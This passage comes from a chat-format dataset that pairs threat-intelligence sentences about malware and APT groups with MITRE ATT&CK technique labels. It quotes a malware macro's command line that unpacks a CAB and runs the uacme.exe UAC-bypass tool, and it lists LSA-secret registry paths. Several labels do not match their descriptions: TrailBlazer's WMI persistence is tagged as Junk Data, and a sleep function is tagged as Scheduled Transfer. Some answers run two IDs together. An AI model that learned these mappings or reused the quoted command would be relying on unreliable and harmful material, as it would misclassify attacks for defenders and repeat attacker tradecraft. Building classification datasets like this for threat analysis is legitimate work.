- "role": "user",
- "content": "The Visual Basic macro uses the following command line: cmd /c expand %TEMP%\\setup.cab -F:* %TEMP% && cd /d %TEMP% && del /f /q setup.cab && uacme.exe The control server credential information contained in the CAB files is different: Decoded credential data contained in another ipnet.ini"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Heyoka Backdoor can decrypt its payload prior to execution."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Several Ke3chang backdoors achieved persistence by adding a Run key."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has a command to set certain attributes such as creation/modification timestamps on files."
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike can SSH to a remote service."
- },
- {
- "role": "assistant",
- "content": "T1021.004 - Remote Services: SSH"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has exfiltrated data in HTTP POST headers."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "surveys a system upon check-in to discover active local network connections using the netstat -an, net use, net file, and net session commands."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turla surveys a system upon check-in to discover files in specific locations on the hard disk %TEMP% directory, the current user's desktop, the Program Files directory, and Recent. Turla RPC backdoors have also searched for files matching the \"lPH*.dll\" pattern."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Operation North Star C2 infrastructure consisted of compromised domains in Italy and other countries. Compromised domains belonged, for example, to an apparel company, an auction house and printing company. These URLs hosted malicious DOTM files, including a malicious ASP page"
- },
- {
- "role": "assistant",
- "content": "T1608.001 - Upload Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The C# implementation of the CharmPower command execution module can use \"cmd\"."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ROKRAT has the ability to gather a list of files and directories on the infected system."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has encrypted documents and malicious executables."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An appetite for stolen code-signing certificates Suckfly has a number of hacktools and malware varieties at its disposal. Figure 1 identifies the malware and tools based on functionality and the number of signed files with unique hashes associated with them"
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Trojan will then use the following regular expression to check the HTTP response to the content upload request for the file identifier value: \\”id\\”:(.*) The Trojan will use this file identifier value to monitor for changes made to the file by the actor by checking for changes to the modification time of the .txt file"
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Denis will decrypt important strings used for C&C communication."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "embeds a Visual Basic script within a malicious Word document as part of initial access; the script is executed when the Word document is opened. The actors also used batch scripting."
- },
- {
- "role": "assistant",
- "content": "T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group has stopped the MSExchangeIS service to render Exchange contents inaccessible to users."
- },
- {
- "role": "assistant",
- "content": "T1489 - Service Stop"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sys10 uses an XOR 0x1 loop to encrypt its C2 domain."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Along with the HTTP part, the binary part was also updated. The encryption remained the same, but Emotet dropped Google Protocol Buffer and switched to its own format. The compression algorithm also changed, with zlib replaced by liblzf. More details about the new protocol can be found in the Threat Intel and CERT Polska reports."
- },
- {
- "role": "assistant",
- "content": "T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Okrum's loader can check the amount of physical memory and terminates itself if the host has less than 1.5 Gigabytes of physical memory in total."
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky has executed malware with \"regsvr32s\"."
- },
- {
- "role": "assistant",
- "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "contains commands to list files and directories, as well as search for files matching certain extensions from a defined list."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The IceApple Server Variable Dumper module iterates over all server variables present for the current request and returns them to the adversary."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POWERTON can install a Registry Run key for persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lokibot has used several packing methods for obfuscation."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rising Sun can modify file attributes to hide files."
- },
- {
- "role": "assistant",
- "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can start SOCKS proxy threads."
- },
- {
- "role": "assistant",
- "content": "T1090 - Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NOKKI has used FTP for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.002 - File Transfer Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In the example, the POWRUNER client sends a random GET request to the C2 server and the C2 server sends the random number (99999999990) as a response. As the response is a random number that ends with ‘0’, POWRUNER sends another random GET request to receive an additional command string. The C2 server sends back Base64 encoded response"
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "(Source: Dell SecureWorks) Passwords, like \"admin-na-google123!@#\" shown in Figure 4, are required to interact with the web shell"
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mivast has the capability to open a remote shell and run basic commands."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TrailBlazer is a sophisticated malware family that provides modular functionality and a very low prevalence. TrailBlazer persists on a compromised host using WMI event subscriptions4 — a technique also used by SeaDuke — although this persistence mechanism is not exclusive to COZY BEAR.5"
- },
- {
- "role": "assistant",
- "content": "T1001.001 - Junk Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DarkComet gathers the username from the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ThiefQuest uses various API to perform behaviors such as executing payloads and performing local enumeration."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After gaining access to the victim’s environment (presumably by using stolen credentials, either obtained via phishing, or bought on the dark web), the attacker sets up remote tunnelling using a SSH tool. The tool is configured to redirect traffic from a malicious domain to a proxy that is listening on a local port. The tunnel is authenticated using the attacker’s private key"
- },
- {
- "role": "assistant",
- "content": "T1572 - Protocol Tunneling"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "P.A.S. Webshell can use a decryption mechanism to process a user supplied password and allow execution."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "modifies the time of a file as specified by the control server."
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Exaramel for Linux can uninstall its persistence mechanism and delete its configuration file."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Reports system hardware and software configuration. This built-in utility is a command line version of the System Information.app (/Applications/Utilities/System Information.app) and is a mainstay of all types of malware, spyware, post-exploitation tools, adware, and PUPs. Because of its deep insight into the entire environment, it can be used for a variety of purposes relating to environment discovery, detection evasion and anti-analysis"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The only way to ensure that deleted files, as well as files that you encrypt with EFS, are safe from recovery is to use a secure delete application. Secure delete applications overwrite a deleted file's on-disk data using techniques that are shown to make disk data unrecoverable, even using recovery technology that can read patterns in magnetic media that reveal weakly deleted files. SDelete (Secure Delete) is such an application. Note that SDelete securely deletes file data, but not file names located in free disk space"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion', 'T1485 - Data Destruction"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The group has made significant improvements to their arsenal recently and has both developed new tools and modified existing ones. The key observations covered below are based on CrowdStrike® Intelligence analysis of BazarLoader, Conti and Ryuk operations"
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HOMEFRY uses a command-line interface."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can download or upload files from its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "contains junk code in its binary, likely to confuse malware analysts."
- },
- {
- "role": "assistant",
- "content": "T1027.001 - Obfuscated Files or Information: Binary Padding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32 has used JavaScript that communicates over HTTP or HTTPS to attacker controlled domains to download additional frameworks. The group has also used downloaded encrypted payloads over HTTP."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Operation Wocao has deleted Windows Event Logs to hinder forensic investigation."
- },
- {
- "role": "assistant",
- "content": "T1070.001 - Indicator Removal on Host: Clear Windows Event Logs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Scan the network environment of the infected machine; checks for availability of specific ports on servers that share the same internal and external subnet mask (i.e 255.255.0.0\\16)"
- },
- {
- "role": "assistant",
- "content": "T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LightNeuron uses AES to encrypt C2 traffic."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cuba has used several built-in API functions for discovery like GetIpNetTable and NetShareEnum."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Green Lambert has created a new executable named `Software Update Check` to appear legitimate."
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rising Sun can test a connection to a specified network IP address over a specified port number."
- },
- {
- "role": "assistant",
- "content": "T1016.001 - System Network Configuration Discovery: Internet Connection Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Wizard Spider has used the “net view” command to locate mapped network shares."
- },
- {
- "role": "assistant",
- "content": "T1135 - Network Share Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "At execution, it installs an application-defined Windows hook. The hook gets windows messages indicating when a network drive has been attached. Upon adding a network drive, the hook calls its “RecordToFile” file stealer method"
- },
- {
- "role": "assistant",
- "content": "T1056.004 - Input Capture: Credential API Hooking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Further reconnaissance is performed in the environment to identify privileged users. First, the built-in net.exe and nltest.exe are used."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bankshot uploads files and secondary payloads to the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This time, weaponized lure documents claiming to contain seminar information on environmental protection were observed exploiting known Microsoft Office vulnerabilities CVE-2017-0199 and CVE-2017-11882 to drop and execute the backdoor binary on the victim’s machine"
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "IceApple's Credential Dumper module can dump LSA secrets from registry keys, including: `HKLM\\SECURITY\\Policy\\PolEKList\\default`, `HKLM\\SECURITY\\Policy\\Secrets\\*\\CurrVal`, and `HKLM\\SECURITY\\Policy\\Secrets\\*\\OldVal`."
- },
- {
- "role": "assistant",
- "content": "T1003.004 - OS Credential Dumping: LSA Secrets"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can dump passwords and save them into \\ProgramData\\Mail\\MailAg\\pwds.txt."
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POWERSTATS can sleep for a given number of seconds."
- },
- {
- "role": "assistant",
- "content": "T1029 - Scheduled Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Deleting volume shadow copies is very typical behavior of ransomware. The Nefilim ransomware uses WMIC with the following command to delete all volume shadow copies on the system to prevent recovery. WMIC is a command-line utility to access WMI."
- },
- {
- "role": "assistant",
- "content": "T1490 - Inhibit System Recovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rocke used scripts which detected and uninstalled antivirus software."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery', 'T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Psylo exfiltrates data to its C2 server over the same protocol as C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT39 has used CrackMapExec and a custom port scanner known as BLUETORCH for network scanning."
- },
- {
- "role": "assistant",
- "content": "T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OilRig has delivered malicious links to achieve execution on the target system."
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses HTTP for C2."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rifdoor has been distributed in e-mails with malicious Excel or Word documents."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can steal access tokens from exiting processes and make tokens from known credentials."
- },
- {
- "role": "assistant",
- "content": "T1134 - Access Token Manipulation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Magic Hound has sent malicious URL links through email to victims. In some cases the URLs were shortened or linked to Word documents with malicious macros that executed PowerShells scripts to download Pupy."
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is a UEFI BIOS rootkit developed by the company Hacking Team to persist remote access software on some targeted systems."
- },
- {
- "role": "assistant",
- "content": "T1014 - Rootkit', 'T1542.001 - Pre-OS Boot: System Firmware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Before writing to disk, inserts a randomly generated string into the middle of the decrypted payload in an attempt to evade hash-based detections."
- },
- {
- "role": "assistant",
- "content": "T1027.001 - Obfuscated Files or Information: Binary Padding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT1 used the commands \"net localgroup\",\"net user\", and \"net group\" to find accounts on the system."
- },
- {
- "role": "assistant",
- "content": "T1087.001 - Account Discovery: Local Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Saint Bot has renamed malicious binaries as `wallpaper.mp4` and `slideshow.mp4` to avoid detection."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Reaver queries the Registry to determine the correct Startup path to use for persistence."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used Mshta.exe to execute its payload."
- },
- {
- "role": "assistant",
- "content": "T1218.005 - Signed Binary Proxy Execution: Mshta"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A USB data collecting tool that checks for a connected USB drive and steals certain file types, encrypting them into a RAR file."
